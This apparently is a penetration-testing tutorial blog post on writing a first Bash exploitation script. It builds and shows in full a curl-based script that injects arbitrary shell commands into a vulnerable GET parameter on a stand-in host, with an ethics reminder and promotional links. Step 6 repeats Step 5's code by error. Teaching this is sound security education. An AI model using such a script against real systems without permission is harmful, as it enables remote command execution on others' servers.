Exploitation scripts are essential tools for penetration testers and red teamers to automate the process of identifying and exploiting vulnerabilities. Bash scripting provides a simple yet powerful way to create your first exploitation script, especially for web-based or network vulnerabilities. In this tutorial, you will learn how to write a basic exploitation script in Bash, helping you automate simple attacks and speed up your testing process.
What is an Exploitation Script?
An exploitation script automates the process of exploiting a vulnerability in a target system. This can include sending crafted payloads, triggering vulnerabilities, or automating manual attack steps. Bash scripts are often used for quick proof-of-concept exploits or to chain multiple commands.
Why Use Bash for Exploitation?
- Simplicity: Easy to write and modify.
- Availability: Bash is available on almost all Linux systems.
- Integration: Easily combine with tools like
curl,nc, andnmap. - Automation: Automate repetitive attack steps.
Prerequisites
- Basic Bash scripting knowledge.
- Tools installed:
curl,nc(netcat). - Target system with a known vulnerability (for testing only, ethically!).
Step 1: Choose a Simple Vulnerability to Exploit
For this tutorial, we’ll create a simple script to exploit a vulnerable web server with a command injection vulnerability in a GET parameter.
Example vulnerable URL:
http://vulnerable.com/ping?host=127.0.0.1
The host parameter is vulnerable to command injection.
Step 2: Set Up Your Bash Script
Create a new script file and make it executable.
touch exploit.sh
chmod +x exploit.sh
Open the file in your text editor.
Step 3: Define Target and Payload
Start your script by accepting the target URL and command to execute as arguments.
#!/bin/bash
if [ $# -lt 2 ]; then
echo "Usage: $0 <target_url> <command>"
echo "Example: $0 http://vulnerable.com/ping?host=127.0.0.1 'id'"
exit 1
fi
TARGET=$1
CMD=$2Step 4: Craft the Exploit URL
Inject the command into the vulnerable parameter. Assuming host is vulnerable, we append ; to inject.
EXPLOIT_URL="${TARGET};${CMD}"
Example: If TARGET is http://vulnerable.com/ping?host=127.0.0.1, and CMD is id, the URL becomes:
http://vulnerable.com/ping?host=127.0.0.1;id
Step 5: Send the Exploit Request with curl
Use curl to send the request and capture the response.
echo "[*] Sending exploit to $EXPLOIT_URL"
RESPONSE=$(curl -s "$EXPLOIT_URL")Step 6: Display the Output
Print the response to the console.
echo "[*] Sending exploit to $EXPLOIT_URL"
RESPONSE=$(curl -s "$EXPLOIT_URL")Full Exploitation Script Example
#!/bin/bash
if [ $# -lt 2 ]; then
echo "Usage: $0 <target_url> <command>"
echo "Example: $0 http://vulnerable.com/ping?host=127.0.0.1 'id'"
exit 1
fi
TARGET=$1
CMD=$2
EXPLOIT_URL="${TARGET};${CMD}"
echo "[*] Sending exploit to $EXPLOIT_URL"
RESPONSE=$(curl -s "$EXPLOIT_URL")
echo "[*] Server response:"
echo "$RESPONSE"Step 7: Run Your Exploit Script
Execute the script with the target URL and command to run.
./exploit.sh "http://vulnerable.com/ping?host=127.0.0.1" "id"
You should see the output of the id command from the vulnerable server if the exploit works.
Important Notes and Ethical Reminder
- Only test on systems you have explicit permission to test.
- Modify the script to fit different vulnerabilities or injection points.
- Always verify and sanitize inputs when writing exploitation tools to avoid unintended damage.
Ready to go deeper?
 Join  Nebitex Lite Membership for free and gain access to more tutorials, micro-courses, walkthroughs, and exclusive hacking resources.
 Join the movement on WhatsApp: Cyber Warrior Africa — connect with like-minded Africans, share your passions, struggles, and wins as you grow in cybersecurity.
Start today at www.nebitex.africa.
Conclusion
Writing your first exploitation script in Bash is a great way to automate simple attacks and learn about vulnerabilities. This example demonstrated exploiting a command injection vulnerability via URL parameters. You can extend this approach to other vulnerabilities and integrate more complex payloads.
I’m Emmanuel Okaiwele, a Secure Web Developer, Offensive Security Engineer, Member Cybersecurity Experts Association of Nigeria – CSEAN, and the founder of Nebitex Africa — a platform dedicated to making cybersecurity simple, practical, and accessible for Africans.
